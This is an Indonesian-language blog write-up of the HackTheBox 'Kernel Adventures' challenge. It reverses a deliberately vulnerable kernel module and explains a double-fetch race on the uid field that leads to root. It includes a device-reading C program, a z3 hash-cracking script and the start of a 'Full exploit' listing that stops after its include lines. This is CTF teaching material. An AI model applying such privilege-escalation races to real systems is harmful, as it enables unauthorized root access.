<!DOCTYPE html>
<html lang="en"><head>
  <meta charset="utf-8" />
  <meta http-equiv="X-UA-Compatible" content="IE=edge" />
  <meta name="viewport" content="width=device-width, initial-scale=1" />
  <!-- Begin Jekyll SEO tag v2.8.0 -->
  <title>Kernel Adventures Part I: SUID binaries are too vulnerable. So I decided to implement su in the Kernel | Abdullah</title>
  <meta name="generator" content="Jekyll v4.3.2" />
  <meta property="og:title" content="Kernel Adventures Part I: SUID binaries are too vulnerable. So I decided to implement su in the Kernel" />
  <meta property="og:locale" content="en_US" />
  <link rel="canonical" href="/2022/08/26/kernel-adventures-part-1.html" />
  <meta property="og:url" content="/2022/08/26/kernel-adventures-part-1.html" />
  <meta property="og:site_name" content="Abdullah" />
  <meta property="og:type" content="article" />
  <meta property="article:published_time" content="2020-08-07T15:57:28+07:00" />
  <meta name="twitter:card" content="summary" />
  <meta property="twitter:title" content="Kernel Adventures Part I: SUID binaries are too vulnerable. So I decided to implement su in the Kernel" />

  <script type="application/ld+json">
    {
      "@context": "https://schema.org",
      "@type": "BlogPosting",
      "dateModified": "2020-08-07T15:57:28+07:00",
      "datePublished": "2020-08-07T15:57:28+07:00",
      "headline": "Kernel Adventures Part I: SUID binaries are too vulnerable. So I decided to implement su in the Kernel",
      "mainEntityOfPage": {
        "@type": "WebPage",
        "@id": "/2022/08/26/kernel-adventures-part-1.html"
      },
      "url": "/2022/08/26/kernel-adventures-part-1.html"
    }
  </script>
  <!-- End Jekyll SEO tag -->
  <link rel="stylesheet" href="/assets/main.custom.css" />
  <link
    type="application/atom+xml"
    rel="alternate"
    href="http://localhost:4000/feed.xml"
    title="Kernel Adventures Part I: SUID binaries are too vulnerable. So I decided to implement su in the Kernel"
  />
</head>
<body><header class="site-header" role="banner">

  <div class="wrapper"><a class="site-title" rel="author" href="/">Abdullah</a><nav class="site-nav">
        <input type="checkbox" id="nav-trigger" class="nav-trigger" />
        <label for="nav-trigger">
          <span class="menu-icon">
            <svg viewBox="0 0 18 15" width="18px" height="15px">
              <path d="M18,1.484c0,0.82-0.665,1.484-1.484,1.484H1.484C0.665,2.969,0,2.304,0,1.484l0,0C0,0.665,0.665,0,1.484,0 h15.032C17.335,0,18,0.665,18,1.484L18,1.484z M18,7.516C18,8.335,17.335,9,16.516,9H1.484C0.665,9,0,8.335,0,7.516l0,0 c0-0.82,0.665-1.484,1.484-1.484h15.032C17.335,6.031,18,6.696,18,7.516L18,7.516z M18,13.516C18,14.335,17.335,15,16.516,15H1.484 C0.665,15,0,14.335,0,13.516l0,0c0-0.82,0.665-1.483,1.484-1.483h15.032C17.335,12.031,18,12.695,18,13.516L18,13.516z"/>
            </svg>
          </span>
        </label>

        <div class="trigger"><a class="page-link" href="/about/">About</a></div>
      </nav></div>
</header>
<main class="page-content" aria-label="Content">
      <div class="wrapper">
        <article class="post h-entry" itemscope itemtype="http://schema.org/BlogPosting">

  <header class="post-header">
    <h1 class="post-title p-name" itemprop="name headline">Kernel Adventures Part I: SUID binaries are too vulnerable. So I decided to implement su in the Kernel</h1>
    <p class="post-meta">
      <time class="dt-published" datetime="2022-08-26T15:57:28+07:00" itemprop="datePublished">Aug 26, 2022
      </time></p>
  </header>

  <div class="post-content e-content" itemprop="articleBody">
    <p>Kernel Adventures, merupakan kernel exploitation yang terdapat disalah satu challenge <a href="www.hackthebox.com">hackthebox</a>. Ini merupakan challenge kernel pertama yang aku selesaikan. Challenge ini memiliki kesulitan medium jadi mungkin ini masih tergolong mudah.</p>

<p>Spoiler alert! karena instance dari challenge ini masih aktif.</p>

<h2 id="0x01-overview">0x01 Overview</h2>

<p>Kernel exploitation adalah challenge kernel yang mana kita sebagai user biasa harus mendapatkan privilege escalation dengan mengeksploitasi bug yang terdapat pada kernel module yang diberikan. Berikut attachment yang diberikan:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>release/
├── bzImage
├── notes.txt
├── rootfs.cpio.gz
└── run.sh
</code></pre></div></div>

<p>Penjelasan singkat mengenai file-file diatas:</p>

<ul>
  <li><code class="language-plaintext highlighter-rouge">bzImage</code> image kernel yang digunakan untuk booting ke sistem operasi. Didalam file ini juga terdapat binary kernel atau biasa disebut <code class="language-plaintext highlighter-rouge">vmlinux</code>.</li>
  <li><code class="language-plaintext highlighter-rouge">rootfs.cpio.gz</code> berisi filesystem image untuk sistem operasi challenge ini.</li>
  <li><code class="language-plaintext highlighter-rouge">run.sh</code> bash script yang digunakan untuk menjalankan sistem operasi.</li>
</ul>

<p>Yang perlu diperhatikan pada kasus ini adalah <code class="language-plaintext highlighter-rouge">rootfs.cpio.gz</code> karena disinilah file kernel module disimpan yang nantinya akan di-insert ke linux kernel menggunakan <code class="language-plaintext highlighter-rouge">insmod</code>.</p>

<h3 id="extracting-linux-image-filesystem">Extracting Linux Image Filesystem</h3>

<p>Ekstraksi filesystem dari image dapat menggunakan perintah <code class="language-plaintext highlighter-rouge">cpio</code> yang ada di-bash.</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ gunzip rootfs.cpio.gz &amp;&amp; mkdir files
$ cd files/
$ cpio -idmv &lt; ../rootfs.cpio
...
$ ls
bin  etc   home  lib    linuxrc  mnt      opt   root  sbin  tmp  var
dev  flag  init  lib64  media    mysu.ko  proc  run   sys   usr
</code></pre></div></div>

<p><code class="language-plaintext highlighter-rouge">init</code> adalah file yang akan dieksekusi pertama kali setelah proses booting selesai. <code class="language-plaintext highlighter-rouge">mysu.ko</code> ini adalah kernel module yang ditambahkan pada kernel. Untuk membaca <code class="language-plaintext highlighter-rouge">flag</code> diperlukan akses root yang bisa didapatkan dengan meng-eksploitasi kernel module <code class="language-plaintext highlighter-rouge">mysu.ko</code>. Lainnya adalah filesystem biasa yang terdapat pada linux.</p>

<h3 id="kernel-module-structure">Kernel Module Structure</h3>

<p>Pada kernel module terdapat 2 fungsi utama yaitu <code class="language-plaintext highlighter-rouge">&lt;mod_name&gt;_init</code> dan <code class="language-plaintext highlighter-rouge">&lt;mod_name&gt;_exit</code>.</p>

<ul>
  <li><code class="language-plaintext highlighter-rouge">&lt;mod_name&gt;_init</code> ini akan dieksekusi ketika module di-load ke kernel.</li>
  <li><code class="language-plaintext highlighter-rouge">&lt;mod_name&gt;_exit</code> ini akan dieksekusi ketika module di-unload dari kernel.</li>
</ul>

<p>Fungsi lain yang digunakan untuk berinteraksi antara kernel dengan user biasanya berawalan dengan <code class="language-plaintext highlighter-rouge">dev_*</code>, sebagai contoh <code class="language-plaintext highlighter-rouge">dev_open</code>, <code class="language-plaintext highlighter-rouge">dev_read</code>, dan <code class="language-plaintext highlighter-rouge">dev_write</code>. Dan ketiganya terdapat pada kernel module <code class="language-plaintext highlighter-rouge">mysu</code>.</p>

<h2 id="0x02-reversing-kernel-module">0x02 Reversing Kernel Module</h2>

<p>Dilihat dari <code class="language-plaintext highlighter-rouge">mysu_init</code>, kernel module akan membuat device pada <code class="language-plaintext highlighter-rouge">/dev/mysu</code> yang nantinya bisa digunakan untuk berinteraksi dengan user.</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kt">unsigned</span> <span class="kt">int</span> <span class="nf">hash</span><span class="p">(</span><span class="k">const</span> <span class="kt">char</span> <span class="o">*</span><span class="n">password</span><span class="p">)</span>
<span class="p">{</span>
    <span class="p">...</span>
    <span class="n">idx</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
    <span class="n">res</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
    <span class="n">password_size</span> <span class="o">=</span> <span class="n">strlen</span><span class="p">(</span><span class="n">password</span><span class="p">);</span>
    <span class="k">while</span> <span class="p">(</span> <span class="n">idx</span> <span class="o">!=</span> <span class="n">password_size</span> <span class="p">)</span>
    <span class="p">{</span>
        <span class="n">tmp</span> <span class="o">=</span> <span class="mi">1025</span> <span class="o">*</span> <span class="p">(</span><span class="n">password</span><span class="p">[</span><span class="n">idx</span><span class="p">]</span> <span class="o">+</span> <span class="n">res</span><span class="p">);</span>
        <span class="n">res</span> <span class="o">=</span> <span class="n">password</span><span class="p">[</span><span class="n">idx</span><span class="o">++</span><span class="p">]</span> <span class="o">^</span> <span class="p">(</span><span class="n">tmp</span> <span class="o">&gt;&gt;</span> <span class="mi">6</span><span class="p">)</span> <span class="o">^</span> <span class="n">tmp</span><span class="p">;</span>
    <span class="p">}</span>
    <span class="k">return</span> <span class="p">(</span><span class="kt">unsigned</span> <span class="kt">int</span><span class="p">)</span><span class="n">res</span><span class="p">;</span>
<span class="p">}</span>
</code></pre></div></div>

<p>Fungsi <code class="language-plaintext highlighter-rouge">hash</code> melakukan kalkulasi per-byte password dengan operasi add, mult, shift, dan xor.</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kt">unsigned</span> <span class="kt">int</span> <span class="nf">dev_read</span><span class="p">(</span><span class="n">__int64</span> <span class="n">a1</span><span class="p">,</span> <span class="kt">void</span> <span class="o">*</span><span class="n">user_buf</span><span class="p">,</span> <span class="kt">unsigned</span> <span class="n">__int64</span> <span class="n">user_copy_size</span><span class="p">)</span>
<span class="p">{</span>
    <span class="p">...</span>
    <span class="n">n</span> <span class="o">=</span> <span class="n">user_copy_size</span><span class="p">;</span>
    <span class="k">if</span> <span class="p">(</span> <span class="n">user_copy_size</span> <span class="o">&gt;</span> <span class="mh">0x20</span> <span class="p">)</span>
        <span class="n">n</span> <span class="o">=</span> <span class="mh">0x20</span><span class="p">;</span>
    <span class="n">memcpy</span><span class="p">(</span><span class="n">user_buf</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">users</span><span class="p">,</span> <span class="n">n</span><span class="p">);</span>
    <span class="k">return</span> <span class="n">n</span><span class="p">;</span>
<span class="p">}</span>
</code></pre></div></div>

<p>Fungsi <code class="language-plaintext highlighter-rouge">dev_read</code> meng-copy <code class="language-plaintext highlighter-rouge">&amp;users</code> ke <code class="language-plaintext highlighter-rouge">user_buf</code> sebanyak <code class="language-plaintext highlighter-rouge">user_copy_size</code> dan panjang request copy tidak bisa lebih dari 32. <code class="language-plaintext highlighter-rouge">&amp;users</code> ini berisi <code class="language-plaintext highlighter-rouge">uid</code> dan <code class="language-plaintext highlighter-rouge">hash</code> dari users dan admin.</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kt">unsigned</span> <span class="kt">int</span> <span class="nf">dev_write</span><span class="p">(</span><span class="n">__int64</span> <span class="n">a1</span><span class="p">,</span> <span class="n">req_s</span> <span class="o">*</span><span class="n">req</span><span class="p">,</span> <span class="kt">unsigned</span> <span class="n">__int64</span> <span class="n">user_write_size</span><span class="p">)</span>
<span class="p">{</span>
    <span class="p">...</span>
    <span class="k">if</span> <span class="p">(</span> <span class="n">user_write_size</span> <span class="o">&lt;=</span> <span class="mi">7</span> <span class="p">)</span>
        <span class="k">return</span> <span class="nb">NULL</span><span class="p">;</span>

    <span class="k">if</span> <span class="p">(</span> <span class="n">req</span><span class="o">-&gt;</span><span class="n">uid</span> <span class="o">==</span> <span class="n">users</span><span class="p">.</span><span class="n">uid</span> <span class="p">)</span>
    <span class="p">{</span>
        <span class="n">password</span> <span class="o">=</span> <span class="n">req</span><span class="o">-&gt;</span><span class="n">password</span><span class="p">;</span>
        <span class="k">if</span> <span class="p">(</span> <span class="n">hash</span><span class="p">(</span><span class="n">req</span><span class="o">-&gt;</span><span class="n">password</span><span class="p">)</span> <span class="o">==</span> <span class="n">users</span><span class="p">.</span><span class="n">hash</span> <span class="p">)</span>
            <span class="k">goto</span> <span class="n">SUCCESS</span><span class="p">;</span>
        <span class="k">if</span> <span class="p">(</span> <span class="n">admin</span><span class="p">.</span><span class="n">uid</span> <span class="o">!=</span> <span class="n">req</span><span class="o">-&gt;</span><span class="n">uid</span> <span class="p">)</span>
            <span class="k">return</span> <span class="nb">NULL</span><span class="p">;</span>
    <span class="p">}</span>
    <span class="k">else</span> <span class="k">if</span> <span class="p">(</span> <span class="n">admin</span><span class="p">.</span><span class="n">uid</span> <span class="o">!=</span> <span class="n">req</span><span class="o">-&gt;</span><span class="n">uid</span> <span class="p">)</span>
    <span class="p">{</span>
        <span class="k">return</span> <span class="nb">NULL</span><span class="p">;</span>
    <span class="p">}</span>

    <span class="n">password</span> <span class="o">=</span> <span class="n">req</span><span class="o">-&gt;</span><span class="n">password</span><span class="p">;</span>

    <span class="k">if</span> <span class="p">(</span> <span class="n">hash</span><span class="p">(</span><span class="n">req</span><span class="o">-&gt;</span><span class="n">password</span><span class="p">)</span> <span class="o">!=</span> <span class="n">admin</span><span class="p">.</span><span class="n">hash</span> <span class="p">)</span>
        <span class="k">return</span> <span class="nb">NULL</span><span class="p">;</span>

    <span class="nl">SUCCESS:</span>
    <span class="n">uid</span> <span class="o">=</span> <span class="n">req</span><span class="o">-&gt;</span><span class="n">uid</span><span class="p">;</span>
    <span class="n">ptr</span> <span class="o">=</span> <span class="n">prepare_creds</span><span class="p">(</span><span class="n">password</span><span class="p">);</span>
    <span class="o">*</span><span class="p">(</span><span class="n">_DWORD</span> <span class="o">*</span><span class="p">)(</span><span class="n">ptr</span> <span class="o">+</span>  <span class="mi">4</span><span class="p">)</span> <span class="o">=</span> <span class="n">uid</span><span class="p">;</span>
    <span class="o">*</span><span class="p">(</span><span class="n">_DWORD</span> <span class="o">*</span><span class="p">)(</span><span class="n">ptr</span> <span class="o">+</span>  <span class="mi">8</span><span class="p">)</span> <span class="o">=</span> <span class="n">uid</span><span class="p">;</span>
    <span class="o">*</span><span class="p">(</span><span class="n">_DWORD</span> <span class="o">*</span><span class="p">)(</span><span class="n">ptr</span> <span class="o">+</span> <span class="mi">12</span><span class="p">)</span> <span class="o">=</span> <span class="n">uid</span><span class="p">;</span>
    <span class="o">*</span><span class="p">(</span><span class="n">_DWORD</span> <span class="o">*</span><span class="p">)(</span><span class="n">ptr</span> <span class="o">+</span> <span class="mi">16</span><span class="p">)</span> <span class="o">=</span> <span class="n">uid</span><span class="p">;</span>
    <span class="o">*</span><span class="p">(</span><span class="n">_DWORD</span> <span class="o">*</span><span class="p">)(</span><span class="n">ptr</span> <span class="o">+</span> <span class="mi">20</span><span class="p">)</span> <span class="o">=</span> <span class="n">uid</span><span class="p">;</span>
    <span class="o">*</span><span class="p">(</span><span class="n">_DWORD</span> <span class="o">*</span><span class="p">)(</span><span class="n">ptr</span> <span class="o">+</span> <span class="mi">24</span><span class="p">)</span> <span class="o">=</span> <span class="n">uid</span><span class="p">;</span>
    <span class="o">*</span><span class="p">(</span><span class="n">_DWORD</span> <span class="o">*</span><span class="p">)(</span><span class="n">ptr</span> <span class="o">+</span> <span class="mi">28</span><span class="p">)</span> <span class="o">=</span> <span class="n">uid</span><span class="p">;</span>
    <span class="o">*</span><span class="p">(</span><span class="n">_DWORD</span> <span class="o">*</span><span class="p">)(</span><span class="n">ptr</span> <span class="o">+</span> <span class="mi">32</span><span class="p">)</span> <span class="o">=</span> <span class="n">uid</span><span class="p">;</span>
    <span class="n">commit_creds</span><span class="p">(</span><span class="n">ptr</span><span class="p">);</span>
    <span class="k">return</span> <span class="n">user_copy_size</span><span class="p">;</span>
<span class="p">}</span>
</code></pre></div></div>

<p>Fungsi <code class="language-plaintext highlighter-rouge">dev_write</code> melakukan perbandingan <code class="language-plaintext highlighter-rouge">req-&gt;uid</code> dan <code class="language-plaintext highlighter-rouge">req-&gt;password</code>’s hash, apakah request user merupakan <code class="language-plaintext highlighter-rouge">users</code> (uid: 1000) atau <code class="language-plaintext highlighter-rouge">admin</code> (uid: 1001). Jika semua pengecekan dapat lolos, maka kernel akan memanggil <code class="language-plaintext highlighter-rouge">commit_creds</code> dengan <code class="language-plaintext highlighter-rouge">cred-&gt;uid = req-&gt;uid</code>.</p>

<p>Jika dilihat pada program, kita tidak bisa mengirim request dengan uid 0. Karena pengecekan hanya mengecek apakah user merupakan <code class="language-plaintext highlighter-rouge">users</code> atau <code class="language-plaintext highlighter-rouge">admin</code>. Jika tidak keduanya maka return null.</p>

<h3 id="bug">Bug</h3>

<p>Jika dilihat pada <code class="language-plaintext highlighter-rouge">dev_write</code> setelah seluruh pengecekan selesai, <code class="language-plaintext highlighter-rouge">user-&gt;uid</code> akan di-fetch ke variable lokal <code class="language-plaintext highlighter-rouge">uid</code> dan akan digunakan untuk meng-assign value uid, gid, dll. dari <code class="language-plaintext highlighter-rouge">struct cred</code> sebagai argument untuk memanggil <code class="language-plaintext highlighter-rouge">commit_creds</code>.</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">if</span> <span class="p">(</span> <span class="n">req</span><span class="o">-&gt;</span><span class="n">uid</span> <span class="o">==</span> <span class="n">users</span><span class="p">.</span><span class="n">uid</span> <span class="p">)</span>
<span class="p">{</span>
    <span class="n">password</span> <span class="o">=</span> <span class="n">req</span><span class="o">-&gt;</span><span class="n">password</span><span class="p">;</span>
    <span class="k">if</span> <span class="p">(</span> <span class="n">hash</span><span class="p">(</span><span class="n">req</span><span class="o">-&gt;</span><span class="n">password</span><span class="p">)</span> <span class="o">==</span> <span class="n">users</span><span class="p">.</span><span class="n">hash</span> <span class="p">)</span>
        <span class="k">goto</span> <span class="n">SUCCESS</span><span class="p">;</span>
    <span class="k">if</span> <span class="p">(</span> <span class="n">admin</span><span class="p">.</span><span class="n">uid</span> <span class="o">!=</span> <span class="n">req</span><span class="o">-&gt;</span><span class="n">uid</span> <span class="p">)</span>
        <span class="k">return</span> <span class="nb">NULL</span><span class="p">;</span>
<span class="p">}</span>
<span class="k">else</span> <span class="k">if</span> <span class="p">(</span> <span class="n">admin</span><span class="p">.</span><span class="n">uid</span> <span class="o">!=</span> <span class="n">req</span><span class="o">-&gt;</span><span class="n">uid</span> <span class="p">)</span>
    <span class="k">return</span> <span class="nb">NULL</span><span class="p">;</span>

<span class="n">password</span> <span class="o">=</span> <span class="n">req</span><span class="o">-&gt;</span><span class="n">password</span><span class="p">;</span>
<span class="k">if</span> <span class="p">(</span> <span class="n">hash</span><span class="p">(</span><span class="n">req</span><span class="o">-&gt;</span><span class="n">password</span><span class="p">)</span> <span class="o">!=</span> <span class="n">admin</span><span class="p">.</span><span class="n">hash</span> <span class="p">)</span>
    <span class="k">return</span> <span class="nb">NULL</span><span class="p">;</span>

<span class="n">SUCCESS</span><span class="o">:</span>
<span class="n">uid</span> <span class="o">=</span> <span class="n">req</span><span class="o">-&gt;</span><span class="n">uid</span><span class="p">;</span> <span class="c1">// fetch</span>
</code></pre></div></div>

<p>Bagaimana jika setelah pengecekan user yang valid selesai, lalu kita mengubah nilai dari <code class="language-plaintext highlighter-rouge">req-&gt;uid</code> tadi pada thread lain? Ini akan menimbulkan inconsistency yang bisa kita manfaatkan untuk mendapatkan <code class="language-plaintext highlighter-rouge">root</code>.</p>

<h2 id="0x03-exploitation">0x03 Exploitation</h2>

<p>Jika dilihat dari notes.txt,</p>

<blockquote>
  <p>“I removed the password hashes in the file I gave you. They’re not supposed to be 0.”</p>
</blockquote>

<p>Author telah menghapus password hash user valid yang terdapat pada <code class="language-plaintext highlighter-rouge">mysu.ko</code> yang diberikan tadi. Maka diperlukan read terlebih dahulu di-server.</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="cp">#define MAX_SIZE 4
</span>
<span class="kt">int</span> <span class="nf">main</span><span class="p">(</span><span class="kt">int</span> <span class="o">*</span><span class="n">argc</span><span class="p">,</span> <span class="k">const</span> <span class="kt">char</span> <span class="o">**</span><span class="n">argv</span><span class="p">[])</span> <span class="p">{</span>
    <span class="kt">int</span> <span class="n">fd</span><span class="p">;</span>
    <span class="kt">int</span> <span class="n">buf</span><span class="p">[</span><span class="n">MAX_SIZE</span><span class="p">];</span>

    <span class="n">fd</span> <span class="o">=</span> <span class="n">open</span><span class="p">(</span><span class="n">DEVICE_PATH</span><span class="p">,</span> <span class="n">O_RDWR</span><span class="p">);</span>
    <span class="k">if</span> <span class="p">(</span><span class="n">fd</span> <span class="o">&lt;</span> <span class="mi">0</span><span class="p">)</span> <span class="p">{</span>
        <span class="n">fprintf</span><span class="p">(</span><span class="n">stderr</span><span class="p">,</span> <span class="s">"%s: failed open the device.</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="o">*</span><span class="n">argv</span><span class="p">);</span>
        <span class="n">exit</span><span class="p">(</span><span class="n">EXIT_FAILURE</span><span class="p">);</span>
    <span class="p">}</span>

    <span class="n">read</span><span class="p">(</span><span class="n">fd</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">buf</span><span class="p">,</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">buf</span><span class="p">));</span>

    <span class="k">for</span><span class="p">(</span><span class="kt">int</span> <span class="n">i</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="n">i</span> <span class="o">&lt;</span> <span class="n">MAX_SIZE</span><span class="p">;</span> <span class="n">i</span><span class="o">++</span><span class="p">)</span>
        <span class="n">printf</span><span class="p">(</span><span class="s">"[%02x]: %08x (%d)</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">i</span><span class="p">,</span> <span class="n">buf</span><span class="p">[</span><span class="n">i</span><span class="p">],</span> <span class="n">buf</span><span class="p">[</span><span class="n">i</span><span class="p">]);</span>

    <span class="k">return</span> <span class="mi">0</span><span class="p">;</span>
<span class="p">}</span>
</code></pre></div></div>

<p>Jalankan pada server akan didapatkan <code class="language-plaintext highlighter-rouge">uid</code> dan <code class="language-plaintext highlighter-rouge">hash</code> password dari <code class="language-plaintext highlighter-rouge">users</code> dan <code class="language-plaintext highlighter-rouge">admin</code> yang valid.</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>/ <span class="nv">$ </span>/tmp/hax
<span class="o">[</span>00]: 000003e8 <span class="o">(</span>1000<span class="o">)</span>
<span class="o">[</span>01]: 03319f75 <span class="o">(</span>53583733<span class="o">)</span>
<span class="o">[</span>02]: 000003e9 <span class="o">(</span>1001<span class="o">)</span>
<span class="o">[</span>03]: 2ab76467 <span class="o">(</span>716661863<span class="o">)</span>
</code></pre></div></div>

<h3 id="cracking-hash-password">Cracking Hash Password</h3>

<p>Tidak tau kenapa, z3 tidak menyelesaikannya secara optimal, sehingga dibutuhkan double check terhadap password yang didapatkan.</p>

<div class="language-py highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kn">from</span> <span class="n">z3</span> <span class="kn">import</span> <span class="o">*</span>

<span class="n">max_uint</span> <span class="o">=</span> <span class="mh">0xFFFFFFFF</span>
<span class="n">max_int</span>  <span class="o">=</span> <span class="mh">0x80000000</span>

<span class="k">def</span> <span class="nf">hash</span><span class="p">(</span><span class="n">s</span><span class="p">):</span>
    <span class="n">res</span> <span class="o">=</span> <span class="mi">0</span>
    <span class="k">for</span> <span class="n">i</span> <span class="ow">in</span> <span class="nf">range</span><span class="p">(</span><span class="nf">len</span><span class="p">(</span><span class="n">s</span><span class="p">)):</span>
        <span class="n">tmp</span> <span class="o">=</span> <span class="p">(</span><span class="mi">1025</span> <span class="o">*</span> <span class="p">(</span><span class="n">s</span><span class="p">[</span><span class="n">i</span><span class="p">]</span> <span class="o">+</span> <span class="n">res</span><span class="p">))</span> <span class="o">&amp;</span> <span class="n">max_uint</span>
        <span class="n">res</span> <span class="o">=</span> <span class="p">(</span><span class="n">s</span><span class="p">[</span><span class="n">i</span><span class="p">]</span> <span class="o">^</span> <span class="p">(</span><span class="n">tmp</span> <span class="o">&gt;&gt;</span> <span class="mi">6</span><span class="p">)</span> <span class="o">^</span> <span class="n">tmp</span><span class="p">)</span> <span class="o">&amp;</span> <span class="n">max_uint</span>
        <span class="n">res</span> <span class="o">=</span> <span class="n">res</span> <span class="o">|</span> <span class="p">(</span><span class="o">-</span><span class="p">(</span><span class="n">res</span> <span class="o">&amp;</span> <span class="n">max_int</span><span class="p">))</span>
    <span class="k">return</span> <span class="n">res</span>

<span class="n">target</span> <span class="o">=</span> <span class="mh">0x03319f75</span> <span class="c1"># users
</span><span class="n">target</span> <span class="o">=</span> <span class="mh">0x2ab76467</span> <span class="c1"># admin
</span><span class="n">length</span> <span class="o">=</span> <span class="mi">8</span>          <span class="c1"># increase if there is no solution by z3.
</span>
<span class="n">s</span> <span class="o">=</span> <span class="nc">Solver</span><span class="p">()</span>
<span class="n">b</span> <span class="o">=</span> <span class="p">[</span><span class="nc">BitVec</span><span class="p">(</span><span class="sa">f</span><span class="sh">'</span><span class="s">b!</span><span class="si">{</span><span class="n">i</span><span class="si">}</span><span class="sh">'</span><span class="p">,</span> <span class="mi">32</span><span class="p">)</span> <span class="k">for</span> <span class="n">i</span> <span class="ow">in</span> <span class="nf">range</span><span class="p">(</span><span class="n">length</span><span class="p">)]</span>

<span class="k">for</span> <span class="n">i</span> <span class="ow">in</span> <span class="nf">range</span><span class="p">(</span><span class="nf">len</span><span class="p">(</span><span class="n">b</span><span class="p">)):</span>
    <span class="n">s</span><span class="p">.</span><span class="nf">add</span><span class="p">(</span><span class="nc">And</span><span class="p">(</span><span class="n">b</span><span class="p">[</span><span class="n">i</span><span class="p">]</span> <span class="o">&gt;</span> <span class="mh">0x20</span><span class="p">,</span> <span class="n">b</span><span class="p">[</span><span class="n">i</span><span class="p">]</span> <span class="o">&lt;</span> <span class="mh">0x7f</span><span class="p">))</span>

<span class="n">s</span><span class="p">.</span><span class="nf">add</span><span class="p">(</span><span class="nf">hash</span><span class="p">(</span><span class="n">b</span><span class="p">)</span> <span class="o">==</span> <span class="n">target</span><span class="p">)</span>

<span class="k">while</span> <span class="n">s</span><span class="p">.</span><span class="nf">check</span><span class="p">()</span> <span class="o">==</span> <span class="n">sat</span><span class="p">:</span>
    <span class="n">m</span> <span class="o">=</span> <span class="n">s</span><span class="p">.</span><span class="nf">model</span><span class="p">()</span>
    <span class="n">p</span> <span class="o">=</span> <span class="nf">bytes</span><span class="p">([</span><span class="n">m</span><span class="p">[</span><span class="n">i</span><span class="p">].</span><span class="nf">as_long</span><span class="p">()</span> <span class="k">for</span> <span class="n">i</span> <span class="ow">in</span> <span class="n">b</span><span class="p">])</span>

    <span class="n">s</span><span class="p">.</span><span class="nf">add</span><span class="p">(</span>
        <span class="nc">Or</span><span class="p">(</span>
            <span class="n">b</span><span class="p">[</span><span class="mi">0</span><span class="p">]</span> <span class="o">!=</span> <span class="n">p</span><span class="p">[</span><span class="mi">0</span><span class="p">],</span>
            <span class="n">b</span><span class="p">[</span><span class="mi">1</span><span class="p">]</span> <span class="o">!=</span> <span class="n">p</span><span class="p">[</span><span class="mi">1</span><span class="p">],</span>
            <span class="n">b</span><span class="p">[</span><span class="mi">2</span><span class="p">]</span> <span class="o">!=</span> <span class="n">p</span><span class="p">[</span><span class="mi">2</span><span class="p">],</span>
            <span class="n">b</span><span class="p">[</span><span class="mi">3</span><span class="p">]</span> <span class="o">!=</span> <span class="n">p</span><span class="p">[</span><span class="mi">3</span><span class="p">],</span>
            <span class="n">b</span><span class="p">[</span><span class="mi">4</span><span class="p">]</span> <span class="o">!=</span> <span class="n">p</span><span class="p">[</span><span class="mi">4</span><span class="p">]</span>
        <span class="p">)</span>
    <span class="p">)</span>

    <span class="k">if</span> <span class="nf">hash</span><span class="p">(</span><span class="n">p</span><span class="p">)</span> <span class="o">==</span> <span class="n">target</span><span class="p">:</span>
        <span class="nf">print</span><span class="p">(</span><span class="sa">f</span><span class="sh">"</span><span class="s">[valid] (</span><span class="si">{</span><span class="n">p</span><span class="p">.</span><span class="nf">hex</span><span class="p">()</span><span class="si">}</span><span class="s">) -&gt; </span><span class="si">{</span><span class="n">p</span><span class="si">}</span><span class="se">\n</span><span class="sh">"</span><span class="p">)</span>
</code></pre></div></div>

<h3 id="attack-ideas">Attack Ideas</h3>

<p>Kita dapat mengubah <code class="language-plaintext highlighter-rouge">req-&gt;uid</code> di-thread lain. Sehingga pada saat pengecekan <code class="language-plaintext highlighter-rouge">req-&gt;uid</code> yang awalnya merupakan uid user biasa dan pengecekan hash password selesai, nilai <code class="language-plaintext highlighter-rouge">req-&gt;uid</code> akan kita ubah menjadi uid root yang nantinya ini akan di-fetch ke variable lokal uid dan digunakan untuk assign <code class="language-plaintext highlighter-rouge">cred</code> struct untuk <code class="language-plaintext highlighter-rouge">commit_creds</code>. Sebagai gambaran alur prosesnya.</p>

<table>
  <thead>
    <tr>
      <th>Other Thread</th>
      <th>Main Thread</th>
    </tr>
  </thead>
  <tbody>
    <tr>
      <td>…</td>
      <td><code class="language-plaintext highlighter-rouge">req-&gt;uid</code> user valid check</td>
    </tr>
    <tr>
      <td>…</td>
      <td><code class="language-plaintext highlighter-rouge">req-&gt;password</code> hash valid check</td>
    </tr>
    <tr>
      <td>set <code class="language-plaintext highlighter-rouge">req-&gt;uid</code> into 0 (root uid)</td>
      <td>uid = <code class="language-plaintext highlighter-rouge">req-&gt;uid</code></td>
    </tr>
    <tr>
      <td>…</td>
      <td>cred-&gt;uid = 0 and others</td>
    </tr>
    <tr>
      <td>…</td>
      <td>commit_creds(cred) will give us root</td>
    </tr>
  </tbody>
</table>

<p>Untuk mengoptimalkan exploit dapat dilakukan race condition untuk mengubah user uid ke root uid, dan break jika sudah mendapatkan root privileged.</p>

<p>Full exploit,</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="cp">#include</span> <span class="cpf">&lt;stdio.h&gt;</span><span class="cp">
#include</span> <span class="cpf">&lt;stdlib.h&gt;</span><span class="cp">
#include</span> <span class="cpf">&lt;string.h&gt;</span><span class="cp">
#include</span> <span class="cpf">&lt;fcntl.h&gt;</span><span class="cp">
#include</span> <span class="cpf">&lt;unistd.h&gt;</span><span class="cp">
